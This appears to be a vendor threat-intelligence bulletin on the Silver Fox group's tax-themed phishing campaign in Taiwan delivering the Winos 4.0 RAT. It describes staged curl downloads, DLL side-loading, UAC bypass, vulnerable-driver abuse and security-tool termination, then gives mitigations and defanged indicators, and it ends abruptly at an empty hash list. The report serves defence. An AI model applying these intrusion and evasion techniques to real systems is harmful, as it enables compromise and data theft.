【CyCraft Monthly Intelligence】Taiwan Tax Filing Alert: Silver Fox Targets Users with Winos 4.0 Spear Phishing

‍

Threat and Impact

Security teams have observed a series of spear phishing attacks targeting Taiwan. The primary threat involves the delivery of Winos 4.0 (ValleyRat), a modular Windows Remote Access Trojan (RAT). This campaign is highly attributed to the APT group Silver Fox (also known as Void Arachne). The activity is assessed as "High Severity" due to its combination of sophisticated social engineering, rapidly rotating delivery infrastructure, and aggressive evasion techniques designed to maintain long-term remote control over victims.

‍

Analyst Perspective

This campaign heavily leverages tax and invoice-related themes, making it particularly dangerous for organizations that frequently handle external accounting, legal compliance, and government documentation. Finance and accounting departments are main targets, as attackers often disguise malware as "official documents" to infiltrate these high-value segments.

‍

Incident Description

The campaign uses localized, practical business scenarios as baits, mimicking Taiwanese standard workflows, including:

• Tax audit notification
• Tax filing software installation
• Cloud invoice downloading
• Government/official website impersonation via similar domains and misleading links.

Victims are lured into opening malicious archives (ZIP) or clicking embedded links. These payloads are hosted across rotating domains and cloud storage services. This high volatility allows attackers to bypass static defense mechanisms, such as one-time domain blocklists.

Primary Threat: Enterprise Infiltration via Winos 4.0

Once executed, Winos 4.0 provides attackers with a flexible platform for remote management and post-exploitation. Its modular plugin architecture allows attackers to load specific modules on demand, including:

• File management
• Screenshots/remote screen interaction
• Remote control
• System administration

A key shift in this campaign is the move toward stealthier and low-footprint execution. This includes storing modules within the Windows registry and utilizing in-memory loading to minimize disk-based access, significantly increasing the difficulty of forensic detection.

The primary impact observed on compromised Windows systems is widespread file encryption, leading to immediate operational disruption. This prevents access to critical data and halts business processes. Furthermore, exfiltrated data may be weaponized for subsequent follow-on attacks.

Scope of Impact

While current observations focus on Taiwan, this APT group remains active across Asia with a broad historical target list, including:

• Healthcare
• Government/public sector
• Critical infrastructure
• Cybersecurity company
• E-commerce and finance
• Sales and management-oriented enterprise.

‍

Technical Details

The core of this event involves a multi-stage phishing campaign targeting Taiwan. It begins with the delivery of Winos 4.0 (ValleyRat), followed by UAC bypass and privilege escalation. The attackers utilize a BYOVD (Bring Your Own Vulnerable Driver) technique to load a vulnerable signed driver (wsftprm.sys) to evade defenses at the kernel level. Finally, a modular RAT is deployed, with core components and plugins downloaded from the C2 server, stored in the Windows registry, and executed via in-memory loading.

In other related cases, the delivery methods for Winos 4.0 have evolved from LNK-based download chains to DLL side-loading. The infrastructure leverages rotating domains and cloud storage services while maintaining a stable C2 (47.76.86.151) for post-exploitation control.

Reconnaissance

Winos 4.0 queries the Windows registry value VulnerableDriverBlocklistEnable at:

• SYSTEM\\CurrentControlSet\\Control\\CI\\Config
• Backup route: ControlSet001

This allows the malware to determine if Microsoft’s Vulnerable Driver Blocklist is enabled and adjust its driver-loading strategy accordingly.

Security Tool Identification via Process Enumeration:

After gaining kernel-level capabilities, the malware compares running processes against a hardcoded list of security products to identify and terminate active defenses.

Resource Development

Rotating Delivery Infrastructure:

Attackers register multiple domains and utilize Chinese cloud storage services to host malicious payloads and archives:

• bqdrzbyq[.]cn(hosting Setup64.exe).
• njhwuyklw[.]com (redirecting to cloud-hosted archives).
• TOS buckets such as *.tos-cn-shanghai.volces[.]com (hosting E-Invoice.rar).

Initial Access

Localized Spear Phishing:

Phishing emails mimick Taiwanese tax and e-invoice workflows (e.g., tax audit notifications, filing software installers, or cloud invocie download).

Payload Delivery through Attachments or Links:

• Campaign 1: RAR archives (e.g., taxIs_RX3001.rar) containing phishing documents and malicious LNK files.
• Campaign 2: Phishing links impersonating official websites, directing users to attacker-controlled cloud storage to download archives containing a legitimate EXE and a malicious DLL for side-loading.

Execution

Campaign 1: LNK → cmd.exe → Staged Download → Installer Extraction

LNK Execution Chain: Use relative paths to call the command processor: ..\\..\\..\\..\\Windows\\System32\\cmd.exe.

Obfuscated Scripts: The script is responsible for multi-staged installation and downloading.

• Create a working directory: %public%\\501
• Copy a legitimate curl.exe and rename it as url.exe
• Download the next-stage executable, Setup64.exe, from bqdrzbyq[.]cn using the renamed program
• Execute DeviceCredentialDeployment.exe to make the behavior appear “normal” during phased deployment.

Installer / Dropper Behavior: When Setup64.exe (disguised as "64-bit Installer_Special Edition") is executed, it searches for an embedded executable resource named EXPAND. It then decompresses and writes this resource to: C:\\ProgramData\\Golden. This establishes a local foundation for the subsequent deployment of ValleyRat and the implementation of defense evasion via drivers.

Campaign 2: Legitimate EXE and Malicious DLL Side-Loading

The attacker's transition from LNK intermediate chains to DLL side-loading involves the following steps:

• The victim executes a legitimate application contained within the compressed archive.
• The legitimate application loads a malicious DLL provided by the attacker, which subsequently executes the next-stage code or shellcode.

A distinct developer artifact, a PDB path, is observed within the malicious DLL: C:\\Users\\Administrator\\Desktop\\大馬專案(二)\\x64\\Release\\DLL.pdb

This indicates a clear division of labor within their organization. This artifact serves as a critical lead for tracking and analyzing other related malicious activities.

Persistence

Registry-Resident Modules (Fileless): After C2 communication is established, core and plugin modules are downloaded and stored directly in the Windows registry, then loaded into memory to minimize the disk footprint.

Privilege Escalation

Bypass UAC to Gain Higher Privileges:

• Winos 4.0 executes RunUAC() and verifies current privileges via CheckAdminPrivileges.
• If privileges are not elevated, it employs BypassUACViaDebugObject, combining RPC AppInfo service calls with Debug Object Hijacking.
• Leverage the whitelisted Windows binary computerdefaults.exe for privilege escalation. This method bypasses UAC prompts, minimizing user visibility and reducing telemetry noise.

Kernel-Level Escalation through BYOVD: The malware loads wsftprm.sys (a signed 64-bit kernel driver, "Topaz OFD - PM", v2.0.0.0) to gain kernel-mode execution capabilities.

Defense Evasion

This campaign utilizes multi-layered defense evasion techniques across all stages of the operation.

• Command obfuscation: Obfuscate cmd.exe chains triggered by LNK files to evade detection.
• Masquerading as trusted tools: Copy and rename the legitimate curl.exe to url.exe within %public%\501. This tactic helps bypass simple allow/block logic based solely on filenames and increases the difficulty of initial forensic investigations.
• Execution via trusted binaries (proxy execution):
  • DLL Side-loading: Leverage legitimate executables as loaders for malicious payloads.
  • Invoke DeviceCredentialDeployment.exe as a "cover" to blend in with normal system behaviors.
• Evasive BYOVD driver loading:
  • Dynamically resolve native APIs from ntdll.dll (e.g., RtlInitUnicodeString, RtlAdjustPrivilege, NtLoadDriver) to load drivers in a specific manner, attempting to circumvent standard service monitoring.
  • Inspect VulnerableDriverBlocklistEnable and adjust behavior based on system security settings.
• Massive suppression of security tools:
  • After gaining kernel privileges, Winos 4.0 continuously monitors and terminates security product processes in real-time.
  • The hardcoded target list includes multiple Microsoft Defender components (e.g., MsMpEng.exe, NisSrv.exe, smartscreen.exe, SecurityHealth*) and various third-party suites (Trend Micro, Symantec, 360, Huorong, Avast, AVG, etc.).
  • This is a critical step to ensure the stable operation of the RAT and minimize the risk of removal.
• Configuration obfuscation:
  • The malware stores configuration elements, including C2 addresses and security process lists, using Base64 encoding (with the latter utilizing double Base64 encoding).
• Minimize disk footprint:
  • Modules and plugins are stored in the Windows registry and loaded directly into memory, reducing file-based detection and leaving fewer forensic artifacts on the disk.

Credential Access

Interception of Login Credentials via Plugins:
This campaign downloads a “Login Module” plugin that supports keylogging capabilities, enabling the interception of user-entered usernames and passwords.

Discovery

• OS/Version verification: Before connecting to the C2 server, Winos 4.0 validates the environment by checking the OS version.
• Security configuration probe: Query the VulnerableDriverBlocklistEnable registry value to understand the system's defensive configurations.
• Security product process discovery: Enumerate running processes and compare them against a built-in termination list to determine which security tools are currently active.

Collection

Screen Capture via Plugin Modules: Winos 4.0 downloads screen-oriented plugin modules, such as:

• High refresh rate screen
• Entertainment/multimedia screen
• Non-standard screen

These modules support screen capture or remote desktop-like data collection, allowing attackers to monitor user activities and exfiltrate sensitive information displayed on the screen.

Command and Control (C2)

Phased Payload Retrieval via Infrastructure Attack

• Action 1: Utilize a masqueraded downloader (%public%\\501\\url.exe, the renamed curl.exe) to download Setup64.exe from bqdrzbyq[.]cn.
• Action 2: Download compressed archives from cloud storage services via phishing redirect infrastructure.

Hardcoded C2 with Runtime Decoding

• Winos 4.0 conceals its C2 IP address 47.76.86.151 using double Base64 encoding (TkRjdU56WXVPRFl1TVRVeA==), which is decoded only at runtime.
• Upon passing environment checks, it connects to the C2 to download the core "Online Module" DLL.

Modular Post-Compromise Control

• After acquiring the Online Module, the malware proceeds to download additional plugins (e.g., File Management, Screen Modules, System Management) and the Login Module.
• These modules are stored in the registry and loaded directly into memory. This allows the attacker to maintain persistent, "remote management" operations while minimizing file-level forensic footprints.
• Service-Level Probing Beyond HTTP/S: Reconnaissance activities include attempted SSH (Port 22) connections to government systems, such as the Australian Department of Finance, Ministry of Finance of Afghanistan, and the Office of the Prime Minister of Nepal. This indicates a high level of interest in direct remote management interfaces rather than just web-based applications.

‍

Mitigation

The success of the Winos 4.0 campaign stems from its use of localized phishing (tax audits, filing software, and invoice themes) integrated with multi-stage loaders, DLL side-loading, and BYOVD techniques utilizing the signed driver wsftprm.sys for kernel-level defense evasion.

Consequently, mitigation strategies must be multi-layered. Organizations should operate under the assumption that "mere static domain blocking is insufficient," as attackers frequently rotate domains and exploit cloud storage services.

1. Block Initial Access: Email, Web, and User Execution Controls

Strengthen Phishing Detection

• Enable real-time anti-phishing, reputation scoring, and dynamic analysis (sandboxing) for both attachments and embedded links. This campaign utilizes look-alike domains (e.g., taxfnat[.]tw) and redirects to cloud-hosted payloads (e.g., tos-cn-shanghai.volces[.]com).
• Treat keywords such as "Official Tax" or "Invoice" as high-risk; apply stricter inspection and sandboxing policies to emails containing these government-related terms.

Neutralize Malicious Archives and LNK Downloaders

• Block or quarantine attachment types common to this attack chain, such as archives containing .LNK files or "installer" EXEs delivered via compressed files.
• Enforce "Sandbox First" or "Dynamic Analysis" for suspicious archives, particularly those with unusual combinations like shortcut files or "decoy document + LNK" pairings.

Security Awareness and Phishing Simulations

• Institutionalize employee education to verify unexpected "government/financial" messages through alternative channels (e.g., official websites or phone), reducing over-reliance on the perceived legitimacy of "localized business processes."

2. Stop Payload Delivery and Pre-Exploitation on Endpoints

Detect/Block Suspicious Command Chains and LOLBins

Hunt or block patterns identified in this campaign, such as:

• Creation of staging directories (e.g., %Public%\\501).
• Copy and rename curl.exe to url.exe followed by download activities.
• Dropg files into unusual paths like  C:\\ProgramData\\Golden.

Intercepting these early-stage high-risk signals can prevent the full establishment of the RAT or its plugin stack.

Application Allowlisting

The second wave of the campaign utilizes DLL side-loading (legitimate EXEs loading malicious DLLs from the same directory). Mitigation includes:

• Enforce allowlists that permit only approved applications to run, restricting execution from user-writable or temporary directories.
• Monitor and alert for "signed/legitimate binaries loading DLLs from abnormal directories."

3. Prevent Privilege Escalation and Driver Abuse (BYOVD)

Activate and Enforce the Execution of Microsoft’s Vulnerable Driver Blocklist

The malware explicitly checks the following registry values:

• SYSTEM\\CurrentControlSet\\Control\\CI\\Config\\VulnerableDriverBlocklistEnable
• SYSTEM\\ControlSet001\\Control\\CI\\Config\\VulnerableDriverBlocklistEnable

Ensure these controls are enabled and monitored. This is a primary mitigation, as the attack's evasion relies heavily on loading wsftprm.sys.

Monitor and Alert Suspicious Driver Loading

Winos 4.0 uses native APIs (e.g., NtLoadDriver) to bypass standard service monitoring. Ensure EDR/SIEM tools collect driver load events and correlate them with:

• Prior UAC bypass attempts.
• Subsequent mass termination of security processes.

Minimize Local Admin Privileges and Harden UAC

The malware bypasses UAC via whitelisted binaries like computerdefaults.exe. Reducing the prevalence of local administrator accounts and monitoring for abnormal elevation through these binaries decreases the likelihood of attackers loading kernel drivers or disabling defenses.

4. Restrict C2 and Post-Exploitation via Network Controls

Block and Hunt Known Infrastructure

For immediate defense and retroactive hunting, block:

• C2 IPs: 47[.]76[.]86[.]151 (and the related 154[.]91[.]64[.]246).
• Delivery Domains/Redirectors: bqdrzbyq[.]cn, taxfnat[.]tw, njhwuyklw[.]com, and suspicious downloads from tos-cn-shanghai.volces[.]com buckets.

Recommended Incident Response (IR) Actions

• If early indicators (LNK→cmd, %Public%\\501, wsftprm.sys loading, or C2 beacons) are observed, isolate the host immediately.
• Assume credentials have been compromised due to high-integrity execution. Perform a password reset for all accounts used on the affected host and review their privileged access status.

Reference

• Massive Winos 4.0 Campaigns Target Taiwan
• 中國駭客 Silver Fox 假借稅務及電子發票名義為幌子，在臺灣散布惡意軟體 Winos 4.0
• Massive Winos4.0 Campaigns Target Taiwan
• Silver FoxAPT Uses Winos 4.0 Malware in Cyber Attacks Against Taiwanese Organizations
• Silver FoxAPT Targets Public Sector via Trojanized Medical Software

IoCs (Indicator of Compromise)

Domains

bqdrzbyq[.]cn

taxfnat[.]tw

njhwuyklw[.]com

twtaxgo[.]cn

taxhub[.]tw

taukeny[.]com

taxpro[.]tw

lmaxjuyh[.]cn

tkooyvff[.]cn

etaxtw[.]cn

twswsb[.]cn

IP

47[.]76[.]86[.]151

URLs

hxxps://twmoi2002.tos-cn-shanghai.volces[.]com/E-Invoice.rar

hxxps://sdfw2026024.tos-cn-shanghai.volces[.]com/E-Invoice.rar

hxxps://twtaxgo[.]cn/uploads/20260129/taxIs_RX3001.7z

SHA256